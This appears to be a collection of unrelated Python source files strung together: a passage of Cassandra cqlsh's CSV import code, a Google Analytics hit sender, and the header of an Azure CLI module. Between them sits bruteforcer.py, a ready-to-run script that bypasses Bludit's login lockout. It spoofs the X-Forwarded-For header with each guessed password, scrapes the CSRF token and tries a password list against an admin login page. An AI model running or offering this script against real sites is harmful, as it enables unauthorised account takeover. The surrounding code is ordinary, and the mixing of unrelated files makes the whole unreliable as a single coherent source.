v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings, except that the converters for some types
# will fail to convert an empty string, in this case the null value should be inserted
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
# do not handle else case, if a statement could not be created, the exception is handled
# in self.wrap_make_statement and the error is reported, if a failure is injected that
# causes the statement to be None, then we should not report the error so that we can test
# the parent process handling missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
bruteforcer.py
|
#!/usr/bin/env python3
'''
Original Author --> https://rastating.github.io/bludit-brute-force-mitigation-bypass/
This is just the fixed version of the above script so i am not taking
any credit for the orginal CVE of this vulnerability. Thank you.
'''
import re, sys
import requests, threading
if len(sys.argv) < 2:
print("Invalid syntax !")
print("Usage : python bruteforcer.py <user1> <user2>")
exit(1)
login_url = 'http://10.10.10.191/admin/login'
def BruteForce(username):
print("[+]: Brute Forcing username : ", username, " ...")
with open("passwords.txt") as proto:
for password in proto:
password = password[:-1] # Parsing the real password out of he way
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}: --> {p} <---'.format(u = username, p = password))
print()
break
for user in sys.argv[1:]:
threading.Thread(target=BruteForce, args=[user]).start()
|
sender.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
from threading import Thread
from requests import Request, Session
from .. import DEFER_METHOD_THREADED, DEFER_METHOD_CELERY
from ..exceptions import SenderException
from . import COLLECT_PATH, DEBUG_PATH, HTTP_URL, SSL_URL, GET_SIZE_LIMIT, POST_SIZE_LIMIT
from .debug import process_debug_response
class AnalyticsSender(object):
"""
Sends predefined data to Google Analytics, either through a ``GET`` or a ``POST``.
:param session: Session object.
:type session: requests.sessions.Session
:param ssl: Use the HTTPS base URL.
:type ssl: bool
:param debug: Only debug hits. They are returned with debug information but not processed by GA.
:type debug: bool
:param default_method: Default method to use for sending. Default is ``GET``. Change to ``POST`` if you always
expect large payloads. Otherwise, it is fine leaving ``post_fallback`` set to ``True``.
:type default_method: unicode | str
:param post_fallback: If the request size is over 2000 bytes, automatically make a ``POST`` request instead of
``GET``.
:type post_fallback: bool
:param timeout: Timeout for sending a request, in seconds. Can also be a tuple for specifying connect and read
timeout separately.
:type timeout: int | (int, int)
"""
def __init__(self, session, ssl=True, debug=False, default_method='GET', post_fallback=True, timeout=10):
self._debug = debug
self._ssl = True
root_url = SSL_URL if ssl else HTTP_URL
if debug:
self._base_url = '{0}{1}{2}'.format(root_url, DEBUG_PATH, COLLECT_PATH)
session.hooks['response'].append(process_debug_response)
else:
self._base_url = '{0}{1}'.format(root_url, COLLECT_PATH)
self._root_url_len = len(root_url)
self._base_url_len = len(self._base_url)
self._session = session
self._timeout = timeout
self.send = getattr(self, default_method.lower())
self._post_fallback = post_fallback
def get(self, request_params):
"""
Sends a hit to GA via a GET-request.
:param request_params: URL parameters.
:type request_params: dict
:return: A response object.
:rtype: requests.models.Response
"""
req = Request('GET', self._base_url, params=request_params)
p_req = self._session.prepare_request(req)
if len(p_req.url) - self._root_url_len > GET_SIZE_LIMIT:
if self._post_fallback:
return self.post(p_req.url[self._base_url_len+1:])
raise SenderException("Request is too large for GET method and POST fallback is deactivated:",
len(p_req.url))
return self._session.send(p_req, timeout=self._timeout)
def post(self, request_data):
"""
Sends a hit to GA via a POST-request.
:param request_data: POST payload.
:type request_data: dict
:return: A response object.
:rtype: requests.models.Response
"""
req = Request('POST', self._base_url, data=request_data)
p_req = self._session.prepare_request(req)
if len(p_req.body) > POST_SIZE_LIMIT:
raise SenderException("Request is too large for POST method:",
len(p_req.body))
return self._session.send(p_req, timeout=self._timeout)
def send(self, request_params):
"""
Assigned to default method as set during instantiation.
"""
pass
@property
def session(self):
return self._session
def get_send_function(defer, **kwargs):
if defer == DEFER_METHOD_CELERY:
try:
from .tasks import send_hit
except ImportError:
send_hit = None
raise ValueError("Celery is not available.")
def _send_func(request_params):
send_hit.apply_async(args=(request_params, time.time()))
return _send_func
sender = AnalyticsSender(Session(), **kwargs)
if defer == DEFER_METHOD_THREADED:
def _send_func(request_params):
Thread(target=sender.send, args=(request_params, )).start()
return _send_func
return sender.send
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
